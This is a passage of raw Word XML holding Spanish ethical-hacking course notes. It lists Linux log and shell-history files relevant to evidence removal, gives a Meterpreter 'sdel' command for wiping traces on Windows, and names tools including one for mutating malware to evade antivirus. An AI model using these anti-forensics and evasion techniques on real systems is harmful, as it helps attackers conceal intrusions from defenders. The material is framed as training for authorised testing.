        <w:t>/var/log/lastlog: logins en el sistema (lastlog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DECEE" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/run/utmp: usuarios en el sistema (who/w)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F471E35" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/dmesg: logs del kernel (dmesg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465EB67D" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>Comandos de shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8BAE14" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA218D9" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.sh_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FFFAB" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79201DDB" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>Comando less:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6026597C" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.lesshst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43DEDC" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>Clientes de FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C97E94" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.lftp/rl_history y cwd_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4509D9BE" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.ncftp/history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F33008" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>Equipos a los que se ha conectado con SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D866CDB" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>~/.ssh/known_hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B187A" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>Logs del servidor de aplicación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6D12B" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>apache/logs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65833815" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>etc/httpd/logs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760B792F" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>var/www/logs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134EE12" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>var/log/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DF4E4" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>usr/local/apache/logs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8AC31" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>var/log/apache/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218293B8" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>var/log/apache2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E8BED" w14:textId="4EF99FBB" w:rsidR="00EE105F" w:rsidRPr="00EE105F" w:rsidRDefault="00EE105F" w:rsidP="000D27DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE105F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5971A039" w14:textId="7C6E572A" w:rsidR="00EE105F" w:rsidRDefault="00EE105F" w:rsidP="000D27DE">
      <w:r>
        <w:t>En el caso de Windows, podemos usar un módulo específico de meterpreter que elimina las evidencias de nuestro ejercicio de hacking ético.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012E44A" w14:textId="0C991656" w:rsidR="00EE105F" w:rsidRPr="00EE105F" w:rsidRDefault="00EE105F" w:rsidP="000D27DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE105F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run post/windows/manage/sdel FILE=\\users\\User\\Desktop\\testdoc.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA93F7" w14:textId="5BF216A9" w:rsidR="00EE105F" w:rsidRDefault="00EE105F" w:rsidP="000D27DE">
      <w:r>
        <w:t>(usar doble barra para que detecte “\” como un carácter especial)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C29FF" w14:textId="78B9BBA3" w:rsidR="00EE105F" w:rsidRDefault="008A3DFF" w:rsidP="000D27DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3DFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">Veasé </w:t>
      </w:r>
      <w:r w:rsidR="00117893" w:rsidRPr="00117893">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Poster DFIR SANS</w:t>
      </w:r>
      <w:r w:rsidR="00117893">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ECAD31" w14:textId="60BD08D7" w:rsidR="008A3DFF" w:rsidRDefault="008A3DFF" w:rsidP="000D27DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190CD82E" w14:textId="1CCE0939" w:rsidR="00117893" w:rsidRDefault="00117893" w:rsidP="000D27DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E1C6FE" w14:textId="61F3DA63" w:rsidR="00117893" w:rsidRDefault="00117893" w:rsidP="00117893">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Otras herramientas de ayuda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390523A" w14:textId="47CF18DF" w:rsidR="00117893" w:rsidRDefault="00117893" w:rsidP="00117893">
      <w:r>
        <w:t>Algunas herramientas que pueden ayudarnos a la realización de nuestro ejercicio de hacking ético:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9F01C" w14:textId="1418F3AA" w:rsidR="00117893" w:rsidRDefault="00117893" w:rsidP="00117893">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00117893">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Batea:</w:t>
      </w:r>
      <w:r w:rsidRPr="00117893">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Herramienta para Kali, recibe un output de Nmap y nos señala qué hosts de los que hayan sido analizados son más propensos a ser vulnerables. Ideal en entornos dónde haya muchos nodos en una misma red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48779C" w14:textId="630DF31C" w:rsidR="00117893" w:rsidRDefault="00117893" w:rsidP="00117893">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00117893">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Pesidious:</w:t>
      </w:r>
      <w:r w:rsidRPr="00117893">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Herramienta que permite mutar malware para esconder nuestros payload de una manera mucho más potente para que no lo detecten los antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29346FA3" w14:textId="14C194E8" w:rsidR="00117893" w:rsidRPr="00117893" w:rsidRDefault="00117893" w:rsidP="00117893">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Polymorph:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Herramienta creada por shramos. Permite no solo interceptar paquetes de la red, sino modificarlos en tiempo real. </w:t>
      </w:r>
      <w:r w:rsidRPr="00117893">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Veasé Manual de Polymorph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>.pdf</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27447F23" w14:textId="720F73FE" w:rsidR="00117893" w:rsidRPr="008A3DFF" w:rsidRDefault="00117893" w:rsidP="00117893">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00117893" w:rsidRPr="008A3DF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ource Sans Pro">
    <w:panose1 w:val="020B0503030403020204"/>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D7444"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D56C4F78"/>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6E64B6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA1E391A"/>
    <w:lvl w:ilvl="0" w:tplc="BCCA29BE">
      <w:start w:val="7"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09595A38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C10ED2B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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="15064C4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5E6B1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950494E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F91079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A9C7A6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB52F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03655C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="172EB3C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9EC756B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="172EB3C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9F14A6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53262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58E43E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="365A66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AA465EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="759AF2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FAD1C32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFC0E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75D6CA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8F6A4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9D8253F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="172EB3C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4A2D6B66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB3CE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D2552C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA1CF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3373320"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05E21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5723302"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="365A66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6222D33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53CAF2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8A86DE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D960F3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95D0E7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A12225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B922C5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64AA2A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1B942A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="426C7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48C0936"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9360E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7E04F81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="172EB3C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89A363C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC0A4C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8B95F7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="365A66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6B4578AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97481D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7206B44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1E881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508640575">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1984502278">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1664818098">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1515994496">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="902520181">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1183397197">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="19354042">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1464539537">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1975519877">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1720282318">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1581208566">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="834223550">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1176267958">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1081834289">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2005550827">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="724111055">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="67964177">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1073237776">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1818377061">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1949700430">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1755131416">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="180048727">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1866819424">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="206377224">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="416748878">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="19819708">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="993683264">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1513909206">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="46597405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026F"/>
    <w:rsid w:val="00016126"/>
    <w:rsid w:val="000252F2"/>
    <w:rsid w:val="00051E9E"/>
    <w:rsid w:val="00064A50"/>
    <w:rsid w:val="00087DCA"/>
    <w:rsid w:val="00097312"/>
    <w:rsid w:val="000A36E7"/>
    <w:rsid w:val="000A4C7F"/>
    <w:rsid w:val="000A4CD6"/>
    <w:rsid w:val="000C5DF5"/>
    <w:rsid w:val="000D05B7"/>
    <w:rsid w:val="000D27DE"/>
    <w:rsid w:val="000F71ED"/>
    <w:rsid w:val="001142D0"/>
    <w:rsid w:val="001176AF"/>
    <w:rsid w:val="00117893"/>
    <w:rsid w:val="00140511"/>
    <w:rsid w:val="0016148C"/>
    <w:rsid w:val="00171070"/>
    <w:rsid w:val="001B1F2A"/>
    <w:rsid w:val="001B5109"/>
    <w:rsid w:val="001E1F57"/>
    <w:rsid w:val="001E52EF"/>
    <w:rsid w:val="001F1970"/>
    <w:rsid w:val="0022068B"/>
    <w:rsid w:val="00223664"/>
    <w:rsid w:val="00231A90"/>
    <w:rsid w:val="00233F4B"/>
    <w:rsid w:val="002529A8"/>
    <w:rsid w:val="002535B6"/>
    <w:rsid w:val="00260315"/>
    <w:rsid w:val="002A7A47"/>
    <w:rsid w:val="002B7B7E"/>
    <w:rsid w:val="002C22CA"/>
    <w:rsid w:val="002D1A64"/>
    <w:rsid w:val="003003D5"/>
    <w:rsid w:val="00314D04"/>
    <w:rsid w:val="00336DAD"/>
    <w:rsid w:val="00353BC6"/>
    <w:rsid w:val="00362019"/>
    <w:rsid w:val="00366CC3"/>
    <w:rsid w:val="00382356"/>
    <w:rsid w:val="00382E67"/>
    <w:rsid w:val="00383F39"/>
    <w:rsid w:val="003926BE"/>
    <w:rsid w:val="003A0618"/>
    <w:rsid w:val="003B051D"/>
    <w:rsid w:val="003B7968"/>
    <w:rsid w:val="003D3497"/>
    <w:rsid w:val="003E05A9"/>
    <w:rsid w:val="003F01D2"/>
    <w:rsid w:val="003F71AC"/>
    <w:rsid w:val="00406613"/>
    <w:rsid w:val="00427A62"/>
    <w:rsid w:val="00446154"/>
    <w:rsid w:val="0045430B"/>
    <w:rsid w:val="004560FC"/>
    <w:rsid w:val="00465CBB"/>
    <w:rsid w:val="0048361A"/>
    <w:rsid w:val="0049522F"/>
    <w:rsid w:val="00497ECD"/>
    <w:rsid w:val="004A2B6E"/>
    <w:rsid w:val="004C06F2"/>
    <w:rsid w:val="004C1C3D"/>
    <w:rsid w:val="004E3C19"/>
    <w:rsid w:val="004E40ED"/>
    <w:rsid w:val="004F1AFA"/>
    <w:rsid w:val="004F60D5"/>
    <w:rsid w:val="00507BAB"/>
    <w:rsid w:val="00540619"/>
    <w:rsid w:val="005715C8"/>
    <w:rsid w:val="0058559C"/>
    <w:rsid w:val="0059384F"/>
    <w:rsid w:val="005C304C"/>
    <w:rsid w:val="005D743D"/>
    <w:rsid w:val="005F144D"/>
    <w:rsid w:val="00607075"/>
    <w:rsid w:val="00612CE8"/>
    <w:rsid w:val="00616051"/>
    <w:rsid w:val="00627555"/>
    <w:rsid w:val="00634B82"/>
    <w:rsid w:val="0064381C"/>
    <w:rsid w:val="00646011"/>
    <w:rsid w:val="00647990"/>
    <w:rsid w:val="006517AF"/>
    <w:rsid w:val="0065449D"/>
    <w:rsid w:val="00657CD4"/>
    <w:rsid w:val="00683A70"/>
    <w:rsid w:val="00693DF4"/>
    <w:rsid w:val="006A21FD"/>
    <w:rsid w:val="006B77D1"/>
    <w:rsid w:val="006D59EB"/>
    <w:rsid w:val="006D7ED8"/>
    <w:rsid w:val="00704AFC"/>
    <w:rsid w:val="00707B9A"/>
    <w:rsid w:val="0073431C"/>
    <w:rsid w:val="007501EE"/>
    <w:rsid w:val="00754995"/>
    <w:rsid w:val="007554CB"/>
    <w:rsid w:val="007571B1"/>
    <w:rsid w:val="00770630"/>
    <w:rsid w:val="00785DD7"/>
    <w:rsid w:val="00791322"/>
    <w:rsid w:val="00797B5E"/>
    <w:rsid w:val="007A3BD9"/>
    <w:rsid w:val="007B32B9"/>
    <w:rsid w:val="007C06B7"/>
    <w:rsid w:val="007D2DC3"/>
    <w:rsid w:val="007F187B"/>
    <w:rsid w:val="007F247C"/>
    <w:rsid w:val="007F5306"/>
    <w:rsid w:val="00814C44"/>
    <w:rsid w:val="00815961"/>
    <w:rsid w:val="008438BA"/>
    <w:rsid w:val="00846BA9"/>
    <w:rsid w:val="00863050"/>
    <w:rsid w:val="00873C75"/>
    <w:rsid w:val="008776A5"/>
    <w:rsid w:val="008961A3"/>
    <w:rsid w:val="008A3DFF"/>
    <w:rsid w:val="008A6DB4"/>
    <w:rsid w:val="008B25C9"/>
    <w:rsid w:val="008C3D4B"/>
    <w:rsid w:val="008F189C"/>
    <w:rsid w:val="00914F90"/>
    <w:rsid w:val="00925EB8"/>
    <w:rsid w:val="0094192F"/>
    <w:rsid w:val="009609E1"/>
    <w:rsid w:val="00967AE9"/>
    <w:rsid w:val="009714DA"/>
    <w:rsid w:val="0097634F"/>
    <w:rsid w:val="00983310"/>
    <w:rsid w:val="009A1BA3"/>
    <w:rsid w:val="009B628E"/>
    <w:rsid w:val="009D32EB"/>
    <w:rsid w:val="009D5497"/>
    <w:rsid w:val="009F2F63"/>
    <w:rsid w:val="00A459E7"/>
    <w:rsid w:val="00A71201"/>
    <w:rsid w:val="00A821B7"/>
    <w:rsid w:val="00A86A9F"/>
    <w:rsid w:val="00A96EBF"/>
    <w:rsid w:val="00AA2266"/>
    <w:rsid w:val="00AA2A0E"/>
    <w:rsid w:val="00AB3213"/>
    <w:rsid w:val="00AB7AE0"/>
    <w:rsid w:val="00AC01A0"/>
    <w:rsid w:val="00AC16C8"/>
    <w:rsid w:val="00AE4649"/>
    <w:rsid w:val="00AE57A6"/>
    <w:rsid w:val="00AE6B3B"/>
    <w:rsid w:val="00AF0BB5"/>
    <w:rsid w:val="00AF7C95"/>
    <w:rsid w:val="00B10CD3"/>
    <w:rsid w:val="00B12393"/>
    <w:rsid w:val="00B36107"/>
    <w:rsid w:val="00B57F70"/>
    <w:rsid w:val="00B865CE"/>
    <w:rsid w:val="00B87216"/>
    <w:rsid w:val="00BA62B8"/>
    <w:rsid w:val="00BB00C8"/>
    <w:rsid w:val="00BB3B47"/>
    <w:rsid w:val="00BB4B53"/>
    <w:rsid w:val="00BC47CD"/>
    <w:rsid w:val="00BC7296"/>
    <w:rsid w:val="00BD5A9A"/>
    <w:rsid w:val="00BE3158"/>
    <w:rsid w:val="00BF00EA"/>
    <w:rsid w:val="00C17599"/>
    <w:rsid w:val="00C17D7A"/>
    <w:rsid w:val="00C248B3"/>
